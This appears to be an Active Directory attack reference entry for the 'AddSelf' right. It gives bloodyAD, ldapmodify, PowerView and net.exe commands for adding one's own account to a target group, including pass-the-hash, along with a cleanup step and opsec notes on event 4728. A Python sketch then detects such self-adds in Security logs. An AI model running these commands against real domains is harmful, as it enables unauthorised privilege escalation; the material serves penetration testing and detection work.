AddSelf
Source can add itself to the target group (Self-Membership extended right)
Applies to: User -> Group
Linux Abuse
bloodyAD: add self to group
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
bloodyAD: add self with hash
bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
ldapmodify (self-membership)
ldapmodify -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' <<EOF
dn: CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>
changetype: modify
add: member
member: CN=<username>,CN=Users,DC=<domain>,DC=<tld>
EOF
Windows Abuse
PowerView
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
CMD / net.exe
net group "<target-group>" <username> /add /domain
AD Module
Add-ADGroupMember -Identity '<target-group>' -Members '<username>'
Verify
Get-DomainGroupMember -Identity '<target-group>' | Where-Object {$_.MemberName -eq '<username>'}
Cleanup (remove self after done)
Remove-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
Opsec
- Self-membership writes generate event 4728 on the DC
- Functionally identical to AddMember, but the source can only add itself: less powerful than AddMember, with the same detection footprint
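
Detection sketch for the Opsec notes above (an added example, not part of the original page): it flags membership events in which the acting account and the added member are the same SID, and records a later self-removal matching the Cleanup step. It goes beyond event 4728 to cover the local and universal group equivalents and the matching removal events. It assumes events exported as XML in chronological order; the sample events are constructed.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ADD_IDS = {"4728", "4732", "4756"}     # member added: global / local / universal group
REMOVE_IDS = {"4729", "4733", "4757"}  # member removed: global / local / universal group

# Builds one constructed Security event carrying only the fields used below.
def _evt(eid, when, subject_sid, member_sid, group):
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID>'
            f'<TimeCreated SystemTime="{when}"/></System><EventData>'
            f'<Data Name="MemberSid">{member_sid}</Data>'
            f'<Data Name="TargetUserName">{group}</Data>'
            f'<Data Name="SubjectUserSid">{subject_sid}</Data></EventData></Event>')

# Constructed sample export, oldest first; SIDs, groups and times are made up.
D = "S-1-5-21-1111-2222-3333"
SAMPLE = "<Events>" + "".join([
    _evt(4728, "2024-01-01T10:00:00Z", f"{D}-1105", f"{D}-1105", "Tier1 Admins"),
    _evt(4728, "2024-01-01T10:05:00Z", f"{D}-500", f"{D}-1106", "Helpdesk"),
    _evt(4729, "2024-01-01T10:20:00Z", f"{D}-1105", f"{D}-1105", "Tier1 Admins"),
    _evt(4756, "2024-01-01T11:00:00Z", f"{D}-1107", f"{D}-1107", "App Owners"),
]) + "</Events>"

def parse(xml_text):
    """Yield the fields needed for the self-membership check from each event."""
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        data = {d.get("Name"): d.text for d in ev.findall("e:EventData/e:Data", NS)}
        yield {"id": ev.findtext("e:System/e:EventID", namespaces=NS),
               "time": ev.find("e:System/e:TimeCreated", NS).get("SystemTime"),
               "subject": data.get("SubjectUserSid"),
               "member": data.get("MemberSid"),
               "group": data.get("TargetUserName")}

def find_self_adds(xml_text):
    """Return group changes where the acting account and the member are the same."""
    findings = {}
    for ev in parse(xml_text):
        if not ev["subject"] or ev["subject"] != ev["member"]:
            continue  # someone changing another account's membership
        key = (ev["subject"], ev["group"])
        if ev["id"] in ADD_IDS:
            findings[key] = {"sid": ev["subject"], "group": ev["group"],
                             "added": ev["time"], "removed": None}
        elif ev["id"] in REMOVE_IDS and key in findings:
            findings[key]["removed"] = ev["time"]  # add followed by self-removal
    return list(findings.values())

if __name__ == "__main__":
    for f in find_self_adds(SAMPLE):
        print(f)
```

A finding with both "added" and "removed" set is a short-lived self-membership, which is worth reviewing against change records for the group.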